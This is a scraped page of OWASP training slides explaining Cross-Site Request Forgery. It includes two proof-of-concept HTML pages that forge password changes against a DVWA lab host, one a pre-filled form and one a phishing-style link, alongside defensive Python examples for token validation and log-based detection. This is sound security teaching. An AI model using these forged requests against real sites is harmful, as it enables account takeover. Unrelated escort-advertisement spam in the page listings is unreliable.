CROSS SITE REQUEST FORGERY
UNDERSTANDING
John Patrick Lita - OWASP Manila Chapter President
Venue: Philippine Army, Cyber Security Division, Taguig City

OWASP Taguig Chapter
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
MEET THE PRESENTER
OWASP Manila Chapter President
Project Manager at Enterprise Linux Professionals
Owner of Active Security Training and Consultancy
Project leader for OWASP Online Academy
john.patrick.lita@owasp.org
2
CROSS SITE REQUEST FORGERY
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute
unwanted actions on a web application in which they're currently authenticated. CSRF
attacks specifically target state-changing requests, not theft of data, since the attacker
has no way to see the response to the forged request. With a little help from social
engineering (such as sending a link via email or chat), an attacker may trick the users
of a web application into executing actions of the attacker's choosing. If the victim is a
normal user, a successful CSRF attack can force the user to perform state-changing
requests like transferring funds, changing their email address, and so forth. If the
victim is an administrative account, CSRF can compromise the entire web application.
3
CSRF ILLUSTRATION
4
Regular Form | CSRF Form Template
COMMENT HERE: | COMMENT HERE:
[POST] | [POST]
The same layout repeats on slides 5 to 9 as the sequence builds up: the comment "I AM AWESOME!" is typed and posted, and appears as "Jaypee: I AM AWESOME!". Then the comment "I AM NOOB!" is typed and posted, and likewise appears as "Jaypee: I AM NOOB!".
CANNOT READ THE ANTI-CSRF
10
NO SERVER SIDE VALIDATION
11
REVIEWING THE FORM
12
CHECKING THE SOURCE CODE
13
CSRF DEMO
PREVENTION MEASURES THAT DO NOT WORK
CSRF TEMPLATE WEB INTERFACE
Copy the code of the CSRF Template and save it as an HTML file, then open the file in any browser you like, click Submit and analyse the behaviour.

After that, try to log in. Proceed to the next page (page 16) for the source code.
15
CSRF TEMPLATE SOURCE CODE
<!DOCTYPE html>
<html>
<head>
  <title>CSRF Template</title>
</head>
<body>
  <!-- Copy of the DVWA change-password form, hosted outside the lab site.
       When Change is clicked, the browser sends the pre-filled values (and
       any DVWA session cookie it holds) to the lab host as a GET request. -->
  <br>
  <form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET">
    New Password:<br>
    <input type="password" autocomplete="off" name="password_new" value="12345"><br>
    Confirm New Password:<br>
    <input type="password" autocomplete="off" name="password_conf" value="12345"><br>
    <input type="submit" value="Change" name="Change">
  </form>
</body>
</html>
16
▸ Using a secret cookie
▸ Remember that all cookies, even the secret ones, will be submitted with every request. All
authentication tokens will be submitted regardless of whether or not the end-user was tricked
into submitting the request. Furthermore, session identifiers are simply used by the application
container to associate the request with a specific session object. The session identifier does not
verify that the end-user intended to submit the request.
17
▸ Only Accept POST requests
▸ Applications can be developed to accept only POST requests for the execution of business logic. The
misconception is that, since the attacker cannot construct a malicious link, a CSRF attack cannot be
executed. Unfortunately, this logic is incorrect. There are numerous methods by which an attacker can
trick a victim into submitting a forged POST request, such as a simple form hosted on an attacker's
website with hidden values. This form can be triggered automatically by JavaScript or can be
triggered by the victim, who thinks the form will do something else.
18
▸ Multi-Step Transaction

Multi-Step transactions are not an adequate prevention of CSRF. As
long as an attacker can predict or deduce each step of the completed
transaction, then CSRF is possible.
▸ URL Rewriting

This might be seen as a useful CSRF prevention technique as the
attacker cannot guess the victim's session ID. However, the user’s
session ID is exposed in the URL. We don't recommend fixing one
security flaw by introducing another.
▸ HTTPS

HTTPS does nothing to defend against CSRF.
19
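The slides above list what does not stop CSRF: a secret session cookie and "POST only" both travel with, or are satisfied by, a request the victim's browser sends on someone else's behalf. The following is an added example, not code from the slides or from DVWA, contrasting exactly those two checks with the synchronizer token pattern that OWASP recommends, plus an Origin check. The cookie name PHPSESSID, the origin SITE_ORIGIN, the in-memory SESSIONS store and the request dictionaries are all assumptions made for the example.

```python
import hmac
import secrets

# Constructed in-memory session store (session id -> session data); stands in for
# whatever the application keeps server-side. The cookie name PHPSESSID and the
# origin SITE_ORIGIN are assumptions for this example, not DVWA's code.
SESSIONS = {}
SITE_ORIGIN = "http://app.example"


def login(username):
    """Create a server-side session and mint a per-session anti-CSRF token."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "csrf_token": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """Token the application embeds as a hidden field in its own forms only."""
    return SESSIONS[sid]["csrf_token"]


def _session_of(request):
    return request["cookies"].get("PHPSESSID")


def change_password(sid, form):
    """The state-changing business logic both handlers guard."""
    if form.get("password_new") != form.get("password_conf"):
        return 400, "passwords do not match"
    SESSIONS[sid]["password"] = form["password_new"]
    return 200, "password changed"


def weak_handler(request):
    """Only the measures the slides call inadequate: a valid session cookie and
    'accept POST only'. The browser attaches the cookie to any request it sends,
    so neither check shows that the user meant to submit this one."""
    sid = _session_of(request)
    if sid not in SESSIONS:
        return 401, "no session"
    if request["method"] != "POST":
        return 405, "POST only"
    return change_password(sid, request["form"])


def hardened_handler(request):
    """The same checks plus a synchronizer token and an Origin check."""
    sid = _session_of(request)
    if sid not in SESSIONS:
        return 401, "no session"
    if request["method"] != "POST":
        return 405, "POST only"
    # A page on another origin cannot read this token, so it cannot supply it.
    submitted = request["form"].get("csrf_token", "")
    expected = SESSIONS[sid]["csrf_token"]
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return 403, "missing or invalid CSRF token"
    # Browsers add Origin to cross-site form POSTs; refuse anything but our own.
    origin = request["headers"].get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return 403, "cross-origin request refused"
    return change_password(sid, request["form"])


def own_form_request(sid):
    """Constructed: what the application's own form submits (token included)."""
    return {"method": "POST", "cookies": {"PHPSESSID": sid},
            "headers": {"Origin": SITE_ORIGIN},
            "form": {"password_new": "hunter2", "password_conf": "hunter2",
                     "csrf_token": csrf_token_for(sid)}}


def cross_site_form_request(sid):
    """Constructed: what a hidden form on another site submits. The browser adds
    the victim's cookie by itself; the foreign page has no way to read the token."""
    return {"method": "POST", "cookies": {"PHPSESSID": sid},
            "headers": {"Origin": "http://other.example"},
            "form": {"password_new": "12345", "password_conf": "12345"}}


if __name__ == "__main__":
    sid = login("jaypee")
    print("weak handler, cross-site form:    ", weak_handler(cross_site_form_request(sid)))
    print("hardened handler, cross-site form:", hardened_handler(cross_site_form_request(sid)))
    print("hardened handler, own form:       ", hardened_handler(own_form_request(sid)))
```

Running it shows the weak handler changing the password from the cross-site form (cookie present, method is POST, so both "defences" pass), while the hardened handler refuses the same request for lack of the token and accepts only the application's own form. The token comparison uses hmac.compare_digest so its timing does not leak how many leading characters matched.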
CSRF DEMO
CSRF ATTACK USING SOCIAL ENGINEERING
One technique, or attack vector, is to perform a click jacking attack. To test it, proceed to the next page for the source code, then execute it by clicking "Click Here!".
21
<!DOCTYPE html>
<html>
<head>
  <title>Please Check your Account Here!</title>
</head>
<body>
  <!-- The link carries the DVWA change-password parameters in its query string;
       a browser that is logged in to the lab host submits them when the link is clicked. -->
  <h1>Check your account Here!</h1>
  <a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">Click Here!</a>
</body>
</html>
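Both demo pages above produce a state-changing request that reaches the lab host from somewhere other than the application's own form, which is visible on the server side. The following is an added detection example, not part of the slides, that reads web-server access log lines in the common "combined" format and flags state-changing requests to the CSRF exercise path whose Referer is absent or points at another host. The log lines are constructed for the example; the lab host 172.16.157.129 and the endpoint path are taken from the slides, and treating a parameterised GET to that path as state-changing is an assumption that matches how the lab's form works.

```python
import re
from urllib.parse import urlparse

# Assumptions for the example: the lab host from the slides serves DVWA, and the
# CSRF exercise path is the only state-changing endpoint considered here.
APP_HOST = "172.16.157.129"
SENSITIVE_PATHS = ("/dvwa/vulnerabilities/csrf/",)

# "combined" log format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: a page view, a change submitted from the app's own form,
# a change submitted from a locally saved HTML file (browsers send no Referer
# from file://, logged as "-"), and a change triggered by a link on another site.
SAMPLE_LOG = """\
172.16.157.1 - - [10/Mar/2016:14:02:11 +0800] "GET /dvwa/vulnerabilities/csrf/ HTTP/1.1" 200 4212 "http://172.16.157.129/dvwa/index.php" "Mozilla/5.0"
172.16.157.1 - - [10/Mar/2016:14:02:40 +0800] "GET /dvwa/vulnerabilities/csrf/?password_new=abc&password_conf=abc&Change=Change HTTP/1.1" 200 4300 "http://172.16.157.129/dvwa/vulnerabilities/csrf/" "Mozilla/5.0"
172.16.157.1 - - [10/Mar/2016:14:05:02 +0800] "GET /dvwa/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change HTTP/1.1" 200 4300 "-" "Mozilla/5.0"
172.16.157.1 - - [10/Mar/2016:14:07:19 +0800] "GET /dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change HTTP/1.1" 200 4300 "http://other.example/check-account.html" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the log fields as a dict, or None for a line that is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_state_changing(entry):
    """A request to a sensitive path is state-changing when it is not a plain GET,
    or when it is a GET carrying parameters (the lab endpoint changes the
    password on GET, as the slides' template shows)."""
    url = urlparse(entry["target"])
    if url.path not in SENSITIVE_PATHS:
        return False
    return entry["method"] != "GET" or bool(url.query)


def referer_verdict(referer):
    """Reason to flag a state-changing request based on its Referer, or None."""
    if referer in ("", "-"):
        return "no Referer on state-changing request"
    host = urlparse(referer).hostname
    if host != APP_HOST:
        return f"cross-site Referer {host}"
    return None


def find_suspicious(log_text):
    """Return (timestamp, client ip, reason) for each state-changing request
    whose Referer is missing or names a host other than the application."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None or not is_state_changing(entry):
            continue
        reason = referer_verdict(entry["referer"])
        if reason:
            findings.append((entry["ts"], entry["ip"], reason))
    return findings


if __name__ == "__main__":
    for ts, ip, reason in find_suspicious(SAMPLE_LOG):
        print(ts, ip, reason)
```

On the sample the first two lines pass (a page view, and a change whose Referer is the lab host itself), while the file-opened template and the "Click Here!" link are both flagged. A missing Referer is a triage signal rather than proof, since privacy settings and Referrer-Policy can strip it; the server-side token check is what actually blocks the request, and this kind of log review is how you notice that it is absent.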
JOHN.PATRICK.LITA@OWASP.ORG
THANK YOU FOR
LISTENING

(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
Test Automation Strategy for Frontend and Backend
Test Automation Strategy for Frontend and BackendTest Automation Strategy for Frontend and Backend
Test Automation Strategy for Frontend and Backend
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service provider
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about us
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱  9999965857  🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 

Understanding CSRF

  • 1. CROSS SITE REQUEST FORGERY UNDERSTANDING John Patrick Lita - OWASP Manila Chapter President Venue: Philippine Army, Cyber Security Division, Taguig City OWASP Taguig Chapter
  • 2. DEEP UNDERSTANDING WITH CSRF VULNERABILITY MEET THE PRESENTER OWASP Manila Chapter President; Project Manager at Enterprise Linux Professionals; Owner of Active Security Training and Consultancy; Project leader for OWASP Online Academy john.patrick.lita@owasp.org 2
  • 3. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CROSS SITE REQUEST FORGERY Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. 3
  • 4. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 4 (figure: "Regular Form" and "CSRF Form Template" side by side, each with a "COMMENT HERE:" field and a POST button)
  • 5. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 5 (same figure; text entered: I AM AWESOME!)
  • 6. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 6 (same figure; text entered: I AM AWESOME!; comment posted: Jaypee: I AM AWESOME!)
  • 7. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 7 (same figure; text entered in the CSRF Form Template: I AM NOOB!)
  • 8. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 8 (same figure; text entered in the CSRF Form Template: I AM NOOB!)
  • 9. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CSRF ILLUSTRATION 9 (same figure; text entered: I AM NOOB!; comment posted under the victim's name: Jaypee: I AM NOOB!)
  • 10. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CANNOT READ THE ANTI-CSRF 10
  • 11. DEEP UNDERSTANDING WITH CSRF VULNERABILITY NO SERVER SIDE VALIDATION 11
  • 12. DEEP UNDERSTANDING WITH CSRF VULNERABILITY REVIEWING THE FORM 12
  • 13. DEEP UNDERSTANDING WITH CSRF VULNERABILITY CHECKING THE SOURCE CODE 13
  • 14. CSRF DEMO DEEP UNDERSTANDING WITH CSRF VULNERABILITY
  • 15. PREVENTION MEASURES THAT DO NOT WORK CSRF TEMPLATE WEB INTERFACE Copy the code of the CSRF Template and save it as an HTML file, then open the file in any browser you like, click Submit and analyse the behaviour. After that, try to log in. Please proceed to the next page (page 16) for the source code. 15
  • 16. PREVENTION MEASURES THAT DO NOT WORK CSRF TEMPLATE SOURCE CODE
 <!DOCTYPE html>
 <html>
 <head>
 <title>CSRF Template</title>
 </head>
 <body>
 <br>
 <form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET">
 New Password:<br>
 <input type="password" autocomplete="off" name="password_new" value="12345"><br>
 Confirm New Password:<br>
 <input type="password" autocomplete="off" name="password_conf" value="12345"><br>
 <input type="submit" value="Change" name="Change">
 </form>
 </body>
 </html> 16
  • 17. PREVENTION MEASURES THAT DO NOT WORK
 ▸ Using a secret cookie
 ▸ Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request. 17
  • 18. PREVENTION MEASURES THAT DO NOT WORK
 ▸ Only Accept POST requests
 ▸ Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's Website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else. (figure: POST REQUEST) 18
  • 19. PREVENTION MEASURES THAT DO NOT WORK
 ▸ Multi-Step Transaction: Multi-step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, then CSRF is possible.
 ▸ URL Rewriting: This might be seen as a useful CSRF prevention technique as the attacker cannot guess the victim's session ID. However, the user's session ID is exposed in the URL. We don't recommend fixing one security flaw by introducing another.
 ▸ HTTPS: HTTPS does nothing to defend against CSRF. 19
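To show, from the defender's side, why the secret-cookie and POST-only measures on slides 17 and 18 fail and what the server must actually check (the token the forged page cannot read, slide 10, compared server-side, slide 11), here is an added Python example that is not part of the presentation: a simulated password-change handler, once trusting only the session cookie and once requiring a per-session synchronizer token. The in-memory session store, the cookie name PHPSESSID, the field name user_token and the request dictionaries are constructed for illustration.

```python
import hmac
import secrets

# Constructed in-memory session store: session id -> session data.
# The anti-CSRF token lives server-side, bound to one session.
SESSIONS = {
    "sid-alice": {"user": "alice", "csrf_token": secrets.token_hex(16)},
}

def current_session(cookies):
    # Resolve the session from the cookie jar the browser attaches automatically.
    return SESSIONS.get(cookies.get("PHPSESSID"))

def change_password_cookie_only(method, cookies, form):
    """Slide 17/18 anti-pattern: trusts the session cookie and insists on POST.
    A form submitted from another site still carries the cookie, so it passes."""
    session = current_session(cookies)
    if method != "POST" or session is None:
        return 403, "rejected"
    if form.get("password_new") != form.get("password_conf"):
        return 400, "mismatch"
    return 200, f"password changed for {session['user']}"

def change_password_with_token(method, cookies, form):
    """Synchronizer token: the form must carry a value only the site's own page
    could have rendered, and the server must compare it before acting."""
    session = current_session(cookies)
    if method != "POST" or session is None:
        return 403, "rejected"
    submitted = form.get("user_token", "")
    # Constant-time comparison against the token bound to this session.
    if not hmac.compare_digest(submitted, session["csrf_token"]):
        return 403, "rejected: anti-CSRF token missing or invalid"
    if form.get("password_new") != form.get("password_conf"):
        return 400, "mismatch"
    return 200, f"password changed for {session['user']}"

# Constructed requests. The browser sends the cookie with both; only the form
# rendered by the site itself can include the session's token.
VICTIM_COOKIES = {"PHPSESSID": "sid-alice"}
FORGED_FORM = {"password_new": "password", "password_conf": "password", "Change": "Change"}
LEGIT_FORM = dict(FORGED_FORM, user_token=SESSIONS["sid-alice"]["csrf_token"])

def demo():
    return {
        "cookie_only_forged": change_password_cookie_only("POST", VICTIM_COOKIES, FORGED_FORM)[0],
        "token_forged": change_password_with_token("POST", VICTIM_COOKIES, FORGED_FORM)[0],
        "token_legit": change_password_with_token("POST", VICTIM_COOKIES, LEGIT_FORM)[0],
    }
```

demo() returns 200 for the forged request against the cookie-only handler, 403 for the same request against the token-checking handler, and 200 for the site's own form with the token.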
  • 20. CSRF DEMO DEEP UNDERSTANDING WITH CSRF VULNERABILITY
  • 21. PREVENTION MEASURES THAT DO NOT WORK CSRF ATTACK USING SOCIAL ENGINEERING One technique, or attack vector, is to perform a clickjacking attack. To test this attack, please proceed to the next page for the source code, then try executing it by clicking "Click Here!" 21
  • 22. PREVENTION MEASURES THAT DO NOT WORK CSRF ATTACK USING SOCIAL ENGINEERING
 <!DOCTYPE html>
 <html>
 <head>
 <title>Please Check your Account Here!</title>
 </head>
 <body>
 <h1>Check your account Here!</h1>
 <a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">Click Here!</a>
 </body>
 </html>